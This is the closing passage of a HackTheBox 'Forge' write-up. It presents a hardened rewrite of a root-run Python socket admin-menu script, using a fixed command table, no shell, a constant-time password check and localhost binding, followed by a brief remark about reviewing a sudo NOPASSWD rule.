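        b"[1] View processes\n[2] View free memory\n"
        b"[3] View listening sockets\n[4] Quit\n")
# Fixed command table: the option number is the only thing a client controls.
COMMANDS = {1: ["ps", "aux"], 2: ["df"], 3: ["ss", "-lnt"]}
SECRET_PATH = "/etc/remote-manage.secret"  # hypothetical path, root-only file


def parse_option(raw):
    """Return the menu number, or None for non-numeric input or numbers outside 1..4."""
    try:
        value = int(raw.strip())
    except ValueError:
        return None
    return value if value in COMMANDS or value == 4 else None


def run_command(argv, runner=subprocess.run):
    """Run a fixed argv (no shell) and return its stdout as bytes."""
    return runner(argv, capture_output=True, check=False).stdout


def handle(raw, runner=subprocess.run):
    """Process one client line. Returns (reply_bytes, keep_going)."""
    option = parse_option(raw)
    if option is None:
        log.warning("rejected input %r", raw)
        return b"Invalid option\n", True
    if option == 4:
        return b"Bye\n", False
    return run_command(COMMANDS[option], runner) + MENU, True


def serve(secret, host="127.0.0.1"):
    """Accept one client on a random localhost port; same menu, no debugger."""
    port = random.randint(1025, 65535)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((host, port))
        sock.listen(1)
        print(f"Listening on {host}:{port}")
        conn, addr = sock.accept()
        with conn:
            conn.send(b"Enter the secret password: ")
            if not hmac.compare_digest(conn.recv(1024).strip(), secret):
                log.warning("bad password from %s", addr)
                conn.send(b"Wrong password!\n")
                return
            conn.send(b"Welcome admin!\n" + MENU)
            keep_going = True
            while keep_going:
                data = conn.recv(1024)
                if not data:
                    break
                reply, keep_going = handle(data)
                conn.send(reply)


# --- constructed test fixture: stand-in for subprocess.run ---------------
class FakeCompleted:
    def __init__(self, stdout):
        self.stdout = stdout


def fake_runner(argv, capture_output=True, check=False):
    return FakeCompleted(b"ran: " + " ".join(argv).encode())


if __name__ == "__main__":
    with open(SECRET_PATH, "rb") as fh:  # hypothetical secret file
        serve(fh.read().strip())
```

The remaining risk is the sudo rule itself: even a clean script run as root is only as safe as its dependencies and the ability to edit it, so a NOPASSWD entry for a Python interpreter plus script path deserves review alongside the code.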

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/376


Source: https://sh1yan.top/2024/01/23/Forge-htb-writeup/
Author: shiyan
Published: 23 January 2024